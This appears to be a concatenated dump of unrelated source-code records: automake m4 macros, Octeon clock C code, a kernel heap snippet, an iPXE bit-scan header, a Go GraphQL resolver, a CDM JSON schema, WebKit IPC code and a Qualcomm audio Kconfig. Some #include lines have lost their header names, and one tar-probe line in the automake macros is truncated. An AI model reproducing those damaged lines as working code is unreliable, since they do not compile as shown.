permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# serial 4\n\n# AM_MAKE_INCLUDE()\n# -----------------\n# Check to see how make treats includes.\nAC_DEFUN([AM_MAKE_INCLUDE],\n[am_make=${MAKE-make}\ncat > confinc << 'END'\nam__doit:\n\t@echo this is the am__doit target\n.PHONY: am__doit\nEND\n# If we don't find an include directive, just comment out the code.\nAC_MSG_CHECKING([for style of include used by $am_make])\nam__include=\"#\"\nam__quote=\n_am_result=none\n# First try GNU make style include.\necho \"include confinc\" > confmf\n# Ignore all kinds of additional output from `make'.\ncase `$am_make -s -f confmf 2> /dev/null` in #(\n*the\\ am__doit\\ target*)\n am__include=include\n am__quote=\n _am_result=GNU\n ;;\nesac\n# Now try BSD make style include.\nif test \"$am__include\" = \"#\"; then\n echo '.include \"confinc\"' > confmf\n case `$am_make -s -f confmf 2> /dev/null` in #(\n *the\\ am__doit\\ target*)\n am__include=.include\n am__quote=\"\\\"\"\n _am_result=BSD\n ;;\n esac\nfi\nAC_SUBST([am__include])\nAC_SUBST([am__quote])\nAC_MSG_RESULT([$_am_result])\nrm -f confinc confmf\n])\n\n# Fake the existence of programs that GNU maintainers use. 
-*- Autoconf -*-\n\n# Copyright (C) 1997, 1999, 2000, 2001, 2003, 2004, 2005, 2008\n# Free Software Foundation, Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# serial 6\n\n# AM_MISSING_PROG(NAME, PROGRAM)\n# ------------------------------\nAC_DEFUN([AM_MISSING_PROG],\n[AC_REQUIRE([AM_MISSING_HAS_RUN])\n$1=${$1-\"${am_missing_run}$2\"}\nAC_SUBST($1)])\n\n\n# AM_MISSING_HAS_RUN\n# ------------------\n# Define MISSING if not defined so far and test if it supports --run.\n# If it does, set am_missing_run to use it, otherwise, to nothing.\nAC_DEFUN([AM_MISSING_HAS_RUN],\n[AC_REQUIRE([AM_AUX_DIR_EXPAND])dnl\nAC_REQUIRE_AUX_FILE([missing])dnl\nif test x\"${MISSING+set}\" != xset; then\n case $am_aux_dir in\n *\\ * | *\\\t*)\n MISSING=\"\\${SHELL} \\\"$am_aux_dir/missing\\\"\" ;;\n *)\n MISSING=\"\\${SHELL} $am_aux_dir/missing\" ;;\n esac\nfi\n# Use eval to expand $SHELL\nif eval \"$MISSING --run true\"; then\n am_missing_run=\"$MISSING --run \"\nelse\n am_missing_run=\n AC_MSG_WARN([`missing' script is too old or missing])\nfi\n])\n\n# Copyright (C) 2003, 2004, 2005, 2006, 2011 Free Software Foundation,\n# Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# serial 1\n\n# AM_PROG_MKDIR_P\n# ---------------\n# Check for `mkdir -p'.\nAC_DEFUN([AM_PROG_MKDIR_P],\n[AC_PREREQ([2.60])dnl\nAC_REQUIRE([AC_PROG_MKDIR_P])dnl\ndnl Automake 1.8 to 1.9.6 used to define mkdir_p. We now use MKDIR_P,\ndnl while keeping a definition of mkdir_p for backward compatibility.\ndnl @MKDIR_P@ is magic: AC_OUTPUT adjusts its value for each Makefile.\ndnl However we cannot define mkdir_p as $(MKDIR_P) for the sake of\ndnl Makefile.ins that do not define MKDIR_P, so we do our own\ndnl adjustment using top_builddir (which is defined more often than\ndnl MKDIR_P).\nAC_SUBST([mkdir_p], [\"$MKDIR_P\"])dnl\ncase $mkdir_p in\n [[\\\\/$]]* | ?:[[\\\\/]]*) ;;\n */*) mkdir_p=\"\\$(top_builddir)/$mkdir_p\" ;;\nesac\n])\n\n# Helper functions for option handling. -*- Autoconf -*-\n\n# Copyright (C) 2001, 2002, 2003, 2005, 2008, 2010 Free Software\n# Foundation, Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# serial 5\n\n# _AM_MANGLE_OPTION(NAME)\n# -----------------------\nAC_DEFUN([_AM_MANGLE_OPTION],\n[[_AM_OPTION_]m4_bpatsubst($1, [[^a-zA-Z0-9_]], [_])])\n\n# _AM_SET_OPTION(NAME)\n# --------------------\n# Set option NAME. Presently that only means defining a flag for this option.\nAC_DEFUN([_AM_SET_OPTION],\n[m4_define(_AM_MANGLE_OPTION([$1]), 1)])\n\n# _AM_SET_OPTIONS(OPTIONS)\n# ------------------------\n# OPTIONS is a space-separated list of Automake options.\nAC_DEFUN([_AM_SET_OPTIONS],\n[m4_foreach_w([_AM_Option], [$1], [_AM_SET_OPTION(_AM_Option)])])\n\n# _AM_IF_OPTION(OPTION, IF-SET, [IF-NOT-SET])\n# -------------------------------------------\n# Execute IF-SET if OPTION is set, IF-NOT-SET otherwise.\nAC_DEFUN([_AM_IF_OPTION],\n[m4_ifset(_AM_MANGLE_OPTION([$1]), [$2], [$3])])\n\n# Check to make sure that the build environment is sane. 
-*- Autoconf -*-\n\n# Copyright (C) 1996, 1997, 2000, 2001, 2003, 2005, 2008\n# Free Software Foundation, Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# serial 5\n\n# AM_SANITY_CHECK\n# ---------------\nAC_DEFUN([AM_SANITY_CHECK],\n[AC_MSG_CHECKING([whether build environment is sane])\n# Just in case\nsleep 1\necho timestamp > conftest.file\n# Reject unsafe characters in $srcdir or the absolute working directory\n# name. Accept space and tab only in the latter.\nam_lf='\n'\ncase `pwd` in\n *[[\\\\\\\"\\#\\$\\&\\'\\`$am_lf]]*)\n AC_MSG_ERROR([unsafe absolute working directory name]);;\nesac\ncase $srcdir in\n *[[\\\\\\\"\\#\\$\\&\\'\\`$am_lf\\ \\\t]]*)\n AC_MSG_ERROR([unsafe srcdir value: `$srcdir']);;\nesac\n\n# Do `set' in a subshell so we don't clobber the current shell's\n# arguments. Must try -L first in case configure is actually a\n# symlink; some systems play weird games with the mod time of symlinks\n# (eg FreeBSD returns the mod time of the symlink's containing\n# directory).\nif (\n set X `ls -Lt \"$srcdir/configure\" conftest.file 2> /dev/null`\n if test \"$[*]\" = \"X\"; then\n # -L didn't work.\n set X `ls -t \"$srcdir/configure\" conftest.file`\n fi\n rm -f conftest.file\n if test \"$[*]\" != \"X $srcdir/configure conftest.file\" \\\n && test \"$[*]\" != \"X conftest.file $srcdir/configure\"; then\n\n # If neither matched, then we have a broken ls. This can happen\n # if, for instance, CONFIG_SHELL is bash and it inherits a\n # broken ls alias from the environment. This has actually\n # happened. Such a system could not be considered \"sane\".\n AC_MSG_ERROR([ls -t appears to fail. Make sure there is not a broken\nalias in your environment])\n fi\n\n test \"$[2]\" = conftest.file\n )\nthen\n # Ok.\n :\nelse\n AC_MSG_ERROR([newly created file is older than distributed files!\nCheck your system clock])\nfi\nAC_MSG_RESULT(yes)])\n\n# Copyright (C) 2001, 2003, 2005, 2011 Free Software Foundation, Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# serial 1\n\n# AM_PROG_INSTALL_STRIP\n# ---------------------\n# One issue with vendor `install' (even GNU) is that you can't\n# specify the program used to strip binaries. This is especially\n# annoying in cross-compiling environments, where the build's strip\n# is unlikely to handle the host's binaries.\n# Fortunately install-sh will honor a STRIPPROG variable, so we\n# always use install-sh in `make install-strip', and initialize\n# STRIPPROG with the value of the STRIP variable (set by the user).\nAC_DEFUN([AM_PROG_INSTALL_STRIP],\n[AC_REQUIRE([AM_PROG_INSTALL_SH])dnl\n# Installed binaries are usually stripped using `strip' when the user\n# run `make install-strip'. 
However `strip' might not be the right\n# tool to use in cross-compilation environments, therefore Automake\n# will honor the `STRIP' environment variable to overrule this program.\ndnl Don't test for $cross_compiling = yes, because it might be `maybe'.\nif test \"$cross_compiling\" != no; then\n AC_CHECK_TOOL([STRIP], [strip], :)\nfi\nINSTALL_STRIP_PROGRAM=\"\\$(install_sh) -c -s\"\nAC_SUBST([INSTALL_STRIP_PROGRAM])])\n\n# Copyright (C) 2006, 2008, 2010 Free Software Foundation, Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# serial 3\n\n# _AM_SUBST_NOTMAKE(VARIABLE)\n# ---------------------------\n# Prevent Automake from outputting VARIABLE = @VARIABLE@ in Makefile.in.\n# This macro is traced by Automake.\nAC_DEFUN([_AM_SUBST_NOTMAKE])\n\n# AM_SUBST_NOTMAKE(VARIABLE)\n# --------------------------\n# Public sister of _AM_SUBST_NOTMAKE.\nAC_DEFUN([AM_SUBST_NOTMAKE], [_AM_SUBST_NOTMAKE($@)])\n\n# Check how to create a tarball. -*- Autoconf -*-\n\n# Copyright (C) 2004, 2005, 2012 Free Software Foundation, Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# serial 2\n\n# _AM_PROG_TAR(FORMAT)\n# --------------------\n# Check how to create a tarball in format FORMAT.\n# FORMAT should be one of `v7', `ustar', or `pax'.\n#\n# Substitute a variable $(am__tar) that is a command\n# writing to stdout a FORMAT-tarball containing the directory\n# $tardir.\n# tardir=directory && $(am__tar) > result.tar\n#\n# Substitute a variable $(am__untar) that extract such\n# a tarball read from stdin.\n# $(am__untar) < result.tar\nAC_DEFUN([_AM_PROG_TAR],\n[# Always define AMTAR for backward compatibility. 
Yes, it's still used\n# in the wild :-( We should find a proper way to deprecate it ...\nAC_SUBST([AMTAR], ['$${TAR-tar}'])\nm4_if([$1], [v7],\n [am__tar='$${TAR-tar} chof - \"$$tardir\"' am__untar='$${TAR-tar} xf -'],\n [m4_case([$1], [ustar],, [pax],,\n [m4_fatal([Unknown tar format])])\nAC_MSG_CHECKING([how to create a $1 tar archive])\n# Loop over all known methods to create a tar archive until one works.\n_am_tools='gnutar m4_if([$1], [ustar], [plaintar]) pax cpio none'\n_am_tools=${am_cv_prog_tar_$1-$_am_tools}\n# Do not fold the above two line into one, because Tru64 sh and\n# Solaris sh will not grok spaces in the rhs of `-'.\nfor _am_tool in $_am_tools\ndo\n case $_am_tool in\n gnutar)\n for _am_tar in tar gnutar gtar;\n do\n AM_RUN_LOG([$_am_tar --version]) && break\n done\n am__tar=\"$_am_tar --format=m4_if([$1], [pax], [posix], [$1]) -chf - \"'\"$$tardir\"'\n am__tar_=\"$_am_tar --format=m4_if([$1], [pax], [posix], [$1]) -chf - \"'\"$tardir\"'\n am__untar=\"$_am_tar -xf -\"\n ;;\n plaintar)\n # Must skip GNU tar: if it does not support --format= it doesn't create\n # ustar tarball either.\n (tar --version) >/dev/null 2>&1 && continue\n am__tar='tar chf - \"$$tardir\"'\n am__tar_='tar chf - \"$tardir\"'\n am__untar='tar xf -'\n ;;\n pax)\n am__tar='pax -L -x $1 -w \"$$tardir\"'\n am__tar_='pax -L -x $1 -w \"$tardir\"'\n am__untar='pax -r'\n ;;\n cpio)\n am__tar='find \"$$tardir\" -print | cpio -o -H $1 -L'\n am__tar_='find \"$tardir\" -print | cpio -o -H $1 -L'\n am__untar='cpio -i -H $1 -d'\n ;;\n none)\n am__tar=false\n am__tar_=false\n am__untar=false\n ;;\n esac\n\n # If the value was cached, stop now. We just wanted to have am__tar\n # and am__untar set.\n test -n \"${am_cv_prog_tar_$1}\" && break\n\n # tar/untar a dummy directory, and stop if the command works\n rm -rf conftest.dir\n mkdir conftest.dir\n echo GrepMe > conftest.dir/file\n AM_RUN_LOG([tardir=conftest.dir && eval $am__tar_ >conftest.tar])\n rm -rf conftest.dir\n if test -s conftest.tar; then\n AM_RUN_LOG([$am__untar /dev/null 2>&1 && break\n fi\ndone\nrm -rf conftest.dir\n\nAC_CACHE_VAL([am_cv_prog_tar_$1], [am_cv_prog_tar_$1=$_am_tool])\nAC_MSG_RESULT([$am_cv_prog_tar_$1])])\nAC_SUBST([am__tar])\nAC_SUBST([am__untar])\n]) # _AM_PROG_TAR\n\nm4_include([../../../acinclude.m4])\n"} {"text": "/***********************license start***************\n * Copyright (c) 2003-2010 Cavium Networks (support@cavium.com). All rights\n * reserved.\n *\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions are\n * met:\n *\n * * Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n *\n * * Redistributions in binary form must reproduce the above\n * copyright notice, this list of conditions and the following\n * disclaimer in the documentation and/or other materials provided\n * with the distribution.\n\n * * Neither the name of Cavium Networks nor the names of\n * its contributors may be used to endorse or promote products\n * derived from this software without specific prior written\n * permission.\n\n * This Software, including technical data, may be subject to U.S. export control\n * laws, including the U.S. 
Export Administration Act and its associated\n * regulations, and may be subject to export or import regulations in other\n * countries.\n\n * TO THE MAXIMUM EXTENT PERMITTED BY LAW, THE SOFTWARE IS PROVIDED \"AS IS\"\n * AND WITH ALL FAULTS AND CAVIUM NETWORKS MAKES NO PROMISES, REPRESENTATIONS OR\n * WARRANTIES, EITHER EXPRESS, IMPLIED, STATUTORY, OR OTHERWISE, WITH RESPECT TO\n * THE SOFTWARE, INCLUDING ITS CONDITION, ITS CONFORMITY TO ANY REPRESENTATION OR\n * DESCRIPTION, OR THE EXISTENCE OF ANY LATENT OR PATENT DEFECTS, AND CAVIUM\n * SPECIFICALLY DISCLAIMS ALL IMPLIED (IF ANY) WARRANTIES OF TITLE,\n * MERCHANTABILITY, NONINFRINGEMENT, FITNESS FOR A PARTICULAR PURPOSE, LACK OF\n * VIRUSES, ACCURACY OR COMPLETENESS, QUIET ENJOYMENT, QUIET POSSESSION OR\n * CORRESPONDENCE TO DESCRIPTION. THE ENTIRE RISK ARISING OUT OF USE OR\n * PERFORMANCE OF THE SOFTWARE LIES WITH YOU.\n ***********************license end**************************************/\n\n\n\n\n\n\n\n/**\n * @file\n *\n * Interface to Core, IO and DDR Clock.\n *\n *
$Revision: 45089 $
\n*/\n\n#ifdef CVMX_BUILD_FOR_LINUX_KERNEL\n#include \n#include \n#include \n#include \n#include \n#include \n#else\n#if !defined(__FreeBSD__) || !defined(_KERNEL)\n#include \"executive-config.h\"\n#endif\n#include \"cvmx.h\"\n#endif\n\n#ifndef CVMX_BUILD_FOR_UBOOT\nstatic uint64_t rate_eclk = 0;\nstatic uint64_t rate_sclk = 0;\nstatic uint64_t rate_dclk = 0;\n#endif\n\n/**\n * Get clock rate based on the clock type.\n *\n * @param clock - Enumeration of the clock type.\n * @return - return the clock rate.\n */\nuint64_t cvmx_clock_get_rate(cvmx_clock_t clock)\n{\n const uint64_t REF_CLOCK = 50000000;\n\n#ifdef CVMX_BUILD_FOR_UBOOT\n uint64_t rate_eclk = 0;\n uint64_t rate_sclk = 0;\n uint64_t rate_dclk = 0;\n#endif\n\n if (cvmx_unlikely(!rate_eclk))\n {\n if (octeon_has_feature(OCTEON_FEATURE_NPEI))\n {\n cvmx_npei_dbg_data_t npei_dbg_data;\n npei_dbg_data.u64 = cvmx_read_csr(CVMX_PEXP_NPEI_DBG_DATA);\n rate_eclk = REF_CLOCK * npei_dbg_data.s.c_mul;\n rate_sclk = rate_eclk;\n }\n else if (octeon_has_feature(OCTEON_FEATURE_PCIE))\n {\n cvmx_mio_rst_boot_t mio_rst_boot;\n mio_rst_boot.u64 = cvmx_read_csr(CVMX_MIO_RST_BOOT);\n rate_eclk = REF_CLOCK * mio_rst_boot.s.c_mul;\n rate_sclk = REF_CLOCK * mio_rst_boot.s.pnr_mul;\n }\n else\n {\n cvmx_dbg_data_t dbg_data;\n dbg_data.u64 = cvmx_read_csr(CVMX_DBG_DATA);\n rate_eclk = REF_CLOCK * dbg_data.s.c_mul;\n rate_sclk = rate_eclk;\n }\n }\n\n switch (clock)\n {\n case CVMX_CLOCK_SCLK:\n case CVMX_CLOCK_TIM:\n case CVMX_CLOCK_IPD:\n return rate_sclk;\n\n case CVMX_CLOCK_RCLK:\n case CVMX_CLOCK_CORE:\n return rate_eclk;\n\n case CVMX_CLOCK_DDR:\n#if !defined(CVMX_BUILD_FOR_LINUX_HOST) && !defined(__OCTEON_NEWLIB__)\n if (cvmx_unlikely(!rate_dclk))\n rate_dclk = cvmx_sysinfo_get()->dram_data_rate_hz;\n#endif\n return rate_dclk;\n }\n\n cvmx_dprintf(\"cvmx_clock_get_rate: Unknown clock type\\n\");\n return 0;\n}\n#ifdef CVMX_BUILD_FOR_LINUX_KERNEL\nEXPORT_SYMBOL(cvmx_clock_get_rate);\n#endif\n"} {"text": "/**\n * $Id$\n * Copyright (C) 2008 - 2014 Nils Asmussen\n *\n * This program is free software; you can redistribute it and/or\n * modify it under the terms of the GNU General Public License\n * as published by the Free Software Foundation; either version 2\n * of the License, or (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program; if not, write to the Free Software\n * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n */\n\n#include \n#include \n#include \n#include \n\nuintptr_t KHeap::allocAreas() {\n\tframeno_t frame = PhysMem::allocate(PhysMem::CRIT);\n\tif(frame == PhysMem::INVALID_FRAME)\n\t\treturn 0;\n\tpages++;\n\treturn DIR_MAP_AREA | (frame * PAGE_SIZE);\n}\n\nuintptr_t KHeap::allocSpace(size_t count) {\n\t/* if its just one page, take a frame from the pmem-stack */\n\tif(count == 1)\n\t\treturn allocAreas();\n\t/* otherwise we have to use contiguous physical memory */\n\tssize_t res = PhysMem::allocateContiguous(count,1);\n\tif(res < 0)\n\t\treturn 0;\n\tpages += count;\n\treturn DIR_MAP_AREA | (res * PAGE_SIZE);\n}\n"} {"text": "#ifndef _BITS_STRINGS_H\n#define _BITS_STRINGS_H\n\n/** @file\n *\n * String functions\n *\n */\n\nFILE_LICENCE ( GPL2_OR_LATER_OR_UBDL );\n\n/**\n * Find first (i.e. least significant) set bit\n *\n * @v value\t\tValue\n * @ret lsb\t\tLeast significant bit set in value (LSB=1), or zero\n */\nstatic inline __attribute__ (( always_inline )) int __ffsl ( long value ) {\n\tunsigned long bits = value;\n\tunsigned long lsb;\n\tunsigned int lz;\n\n\t/* Extract least significant set bit */\n\tlsb = ( bits & -bits );\n\n\t/* Count number of leading zeroes before LSB */\n\t__asm__ ( \"clz %0, %1\" : \"=r\" ( lz ) : \"r\" ( lsb ) );\n\n\treturn ( 32 - lz );\n}\n\n/**\n * Find first (i.e. least significant) set bit\n *\n * @v value\t\tValue\n * @ret lsb\t\tLeast significant bit set in value (LSB=1), or zero\n */\nstatic inline __attribute__ (( always_inline )) int __ffsll ( long long value ){\n\tunsigned long high = ( value >> 32 );\n\tunsigned long low = ( value >> 0 );\n\n\tif ( low ) {\n\t\treturn ( __ffsl ( low ) );\n\t} else if ( high ) {\n\t\treturn ( 32 + __ffsl ( high ) );\n\t} else {\n\t\treturn 0;\n\t}\n}\n\n/**\n * Find last (i.e. most significant) set bit\n *\n * @v value\t\tValue\n * @ret msb\t\tMost significant bit set in value (LSB=1), or zero\n */\nstatic inline __attribute__ (( always_inline )) int __flsl ( long value ) {\n\tunsigned int lz;\n\n\t/* Count number of leading zeroes */\n\t__asm__ ( \"clz %0, %1\" : \"=r\" ( lz ) : \"r\" ( value ) );\n\n\treturn ( 32 - lz );\n}\n\n/**\n * Find last (i.e. 
most significant) set bit\n *\n * @v value\t\tValue\n * @ret msb\t\tMost significant bit set in value (LSB=1), or zero\n */\nstatic inline __attribute__ (( always_inline )) int __flsll ( long long value ){\n\tunsigned long high = ( value >> 32 );\n\tunsigned long low = ( value >> 0 );\n\n\tif ( high ) {\n\t\treturn ( 32 + __flsl ( high ) );\n\t} else if ( low ) {\n\t\treturn ( __flsl ( low ) );\n\t} else {\n\t\treturn 0;\n\t}\n}\n\n#endif /* _BITS_STRINGS_H */\n"} {"text": "package graphqlbackend\n\nimport (\n\t\"context\"\n\n\t\"github.com/graph-gophers/graphql-go\"\n\t\"github.com/sourcegraph/sourcegraph/internal/conf\"\n\t\"github.com/sourcegraph/sourcegraph/schema\"\n)\n\ntype versionContextResolver struct {\n\tvc *schema.VersionContext\n}\n\nfunc (v *versionContextResolver) ID() graphql.ID {\n\treturn graphql.ID(v.vc.Name)\n}\n\nfunc (v *versionContextResolver) Name() string {\n\treturn v.vc.Name\n}\n\nfunc (v *versionContextResolver) Description() string {\n\treturn v.vc.Description\n}\n\nfunc NewVersionContextResolver(vc *schema.VersionContext) *versionContextResolver {\n\treturn &versionContextResolver{\n\t\tvc: vc,\n\t}\n}\n\nfunc (r *schemaResolver) VersionContexts(ctx context.Context) ([]*versionContextResolver, error) {\n\tvar versionContexts []*versionContextResolver\n\n\tfor _, vc := range conf.Get().ExperimentalFeatures.VersionContexts {\n\t\tversionContexts = append(versionContexts, NewVersionContextResolver(vc))\n\t}\n\n\treturn versionContexts, nil\n}\n"} {"text": "{\n \"jsonSchemaSemanticVersion\": \"1.0.0\",\n \"imports\": [\n {\n \"corpusPath\": \"cdm:/foundations.1.1.cdm.json\"\n },\n {\n \"corpusPath\": \"/core/operationsCommon/Common.1.0.cdm.json\",\n \"moniker\": \"base_Common\"\n },\n {\n \"corpusPath\": \"/core/operationsCommon/DataEntityView.1.0.cdm.json\",\n \"moniker\": \"base_DataEntityView\"\n },\n {\n \"corpusPath\": \"/core/operationsCommon/Tables/Finance/Budget/Group/BudgetModel.1.0.cdm.json\"\n },\n {\n \"corpusPath\": \"/core/operationsCommon/Tables/Finance/Ledger/Group/LedgerPeriodCode.1.0.cdm.json\"\n },\n {\n \"corpusPath\": \"/core/operationsCommon/Tables/Finance/Ledger/Group/LedgerRRGETemplates_W.1.0.cdm.json\"\n },\n {\n \"corpusPath\": \"/core/operationsCommon/Tables/Finance/FinancialDimensions/Group/DimensionHierarchy.1.0.cdm.json\"\n },\n {\n \"corpusPath\": \"/core/operationsCommon/Tables/Finance/Ledger/Main/CompanyInfo.1.0.cdm.json\"\n }\n ],\n \"definitions\": [\n {\n \"entityName\": \"LedgerRRGReportTable_RU\",\n \"extendsEntity\": \"base_Common/Common\",\n \"exhibitsTraits\": [\n {\n \"traitReference\": \"is.CDM.entityVersion\",\n \"arguments\": [\n {\n \"name\": \"versionNumber\",\n \"value\": \"1.0\"\n }\n ]\n }\n ],\n \"hasAttributes\": [\n {\n \"name\": \"CurrencyForCalc\",\n \"dataType\": \"integer\",\n \"isNullable\": true,\n \"description\": \"\"\n },\n {\n \"name\": \"DataType\",\n \"dataType\": \"integer\",\n \"isNullable\": true,\n \"description\": \"\"\n },\n {\n \"name\": \"Description\",\n \"dataType\": \"Description\",\n \"description\": \"\"\n },\n {\n \"name\": \"LedgerPeriodCode\",\n \"dataType\": \"LedgerRRGEPeriodCode_W\",\n \"isNullable\": true,\n \"description\": \"\"\n },\n {\n \"name\": \"LedgerRRGETemplates_W\",\n \"dataType\": \"LedgerRRGETemplateRecId_W\",\n \"isNullable\": true,\n \"description\": \"\"\n },\n {\n \"name\": \"ModelNum\",\n \"dataType\": \"BudgetModelId\",\n \"isNullable\": true,\n \"description\": \"\"\n },\n {\n \"name\": \"PointSignNum\",\n \"dataType\": \"LedgerRRGEPointSignNum_W\",\n 
\"isNullable\": true,\n \"description\": \"\"\n },\n {\n \"name\": \"RepCode\",\n \"dataType\": \"LedgerRRGRepCode_RU\",\n \"description\": \"\"\n },\n {\n \"name\": \"ReportType\",\n \"dataType\": \"integer\",\n \"isNullable\": true,\n \"description\": \"\"\n },\n {\n \"name\": \"Scale\",\n \"dataType\": \"LedgerRRGEScale_W\",\n \"description\": \"\"\n },\n {\n \"name\": \"Template\",\n \"dataType\": \"FilenameOpen\",\n \"isNullable\": true,\n \"description\": \"\"\n },\n {\n \"name\": \"TypeByCorrect\",\n \"dataType\": \"integer\",\n \"isNullable\": true,\n \"description\": \"\"\n },\n {\n \"name\": \"DimensionHierarchy\",\n \"dataType\": \"DimensionHierarchyId\",\n \"isNullable\": true,\n \"description\": \"\"\n },\n {\n \"name\": \"DataAreaId\",\n \"dataType\": \"string\",\n \"isReadOnly\": true\n },\n {\n \"entity\": {\n \"entityReference\": \"BudgetModel\"\n },\n \"name\": \"Relationship_BudgetModelRelationship\",\n \"resolutionGuidance\": {\n \"entityByReference\": {\n \"allowReference\": true\n }\n }\n },\n {\n \"entity\": {\n \"entityReference\": \"LedgerPeriodCode\"\n },\n \"name\": \"Relationship_LedgerPeriodCodeRelationship\",\n \"resolutionGuidance\": {\n \"entityByReference\": {\n \"allowReference\": true\n }\n }\n },\n {\n \"entity\": {\n \"entityReference\": \"LedgerRRGETemplates_W\"\n },\n \"name\": \"Relationship_LedgerRRGETemplates_WRelationship\",\n \"resolutionGuidance\": {\n \"entityByReference\": {\n \"allowReference\": true\n }\n }\n },\n {\n \"entity\": {\n \"entityReference\": \"DimensionHierarchy\"\n },\n \"name\": \"Relationship_DimensionHierarchyRelationship\",\n \"resolutionGuidance\": {\n \"entityByReference\": {\n \"allowReference\": true\n }\n }\n },\n {\n \"entity\": {\n \"entityReference\": \"CompanyInfo\"\n },\n \"name\": \"Relationship_CompanyRelationship\",\n \"resolutionGuidance\": {\n \"entityByReference\": {\n \"allowReference\": true\n }\n }\n }\n ],\n \"displayName\": \"Reports\"\n },\n {\n \"dataTypeName\": \"Description\",\n \"extendsDataType\": \"string\"\n },\n {\n \"dataTypeName\": \"LedgerRRGEPeriodCode_W\",\n \"extendsDataType\": \"string\"\n },\n {\n \"dataTypeName\": \"LedgerRRGETemplateRecId_W\",\n \"extendsDataType\": \"bigInteger\"\n },\n {\n \"dataTypeName\": \"BudgetModelId\",\n \"extendsDataType\": \"string\"\n },\n {\n \"dataTypeName\": \"LedgerRRGEPointSignNum_W\",\n \"extendsDataType\": \"integer\"\n },\n {\n \"dataTypeName\": \"LedgerRRGRepCode_RU\",\n \"extendsDataType\": \"string\"\n },\n {\n \"dataTypeName\": \"LedgerRRGEScale_W\",\n \"extendsDataType\": \"decimal\"\n },\n {\n \"dataTypeName\": \"FilenameOpen\",\n \"extendsDataType\": \"string\"\n },\n {\n \"dataTypeName\": \"DimensionHierarchyId\",\n \"extendsDataType\": \"bigInteger\"\n }\n ]\n}"} {"text": "/*\n * Copyright (C) 2011 Apple Inc. All rights reserved.\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n * 1. Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n * 2. Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the distribution.\n *\n * THIS SOFTWARE IS PROVIDED BY APPLE INC. 
AND ITS CONTRIBUTORS ``AS IS''\n * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n * THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS\n * BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF\n * THE POSSIBILITY OF SUCH DAMAGE.\n */\n\n#import \"config.h\"\n#import \"AttributedString.h\"\n\n#import \"ArgumentCodersMac.h\"\n#import \"ArgumentDecoder.h\"\n#import \"ArgumentEncoder.h\"\n\nnamespace WebKit {\n\nvoid AttributedString::encode(IPC::ArgumentEncoder& encoder) const\n{\n encoder << static_cast(!string);\n if (!string)\n return;\n IPC::encode(encoder, string.get());\n}\n\nbool AttributedString::decode(IPC::ArgumentDecoder& decoder, AttributedString& attributedString)\n{\n bool isNull;\n if (!decoder.decode(isNull))\n return false;\n if (isNull)\n return true;\n return IPC::decode(decoder, attributedString.string);\n}\n\n}\n"} {"text": "config SND_SOC_QCOM\n\ttristate \"ASoC support for QCOM platforms\"\n\tdepends on ARCH_QCOM || COMPILE_TEST\n\thelp\n Say Y or M if you want to add support to use audio devices\n in Qualcomm Technologies SOC-based platforms.\n\nconfig SND_SOC_LPASS_CPU\n\ttristate\n\tselect REGMAP_MMIO\n\nconfig SND_SOC_LPASS_PLATFORM\n\ttristate\n\tselect REGMAP_MMIO\n\nconfig SND_SOC_LPASS_IPQ806X\n\ttristate\n\tselect SND_SOC_LPASS_CPU\n\tselect SND_SOC_LPASS_PLATFORM\n\nconfig SND_SOC_LPASS_APQ8016\n\ttristate\n\tselect SND_SOC_LPASS_CPU\n\tselect SND_SOC_LPASS_PLATFORM\n\nconfig SND_SOC_STORM\n\ttristate \"ASoC I2S support for Storm boards\"\n\tdepends on SND_SOC_QCOM\n\tselect SND_SOC_LPASS_IPQ806X\n\tselect SND_SOC_MAX98357A\n\thelp\n Say Y or M if you want add support for SoC audio on the\n Qualcomm Technologies IPQ806X-based Storm board.\n\nconfig SND_SOC_APQ8016_SBC\n\ttristate \"SoC Audio support for APQ8016 SBC platforms\"\n\tdepends on SND_SOC_QCOM\n\tselect SND_SOC_LPASS_APQ8016\n\thelp\n Support for Qualcomm Technologies LPASS audio block 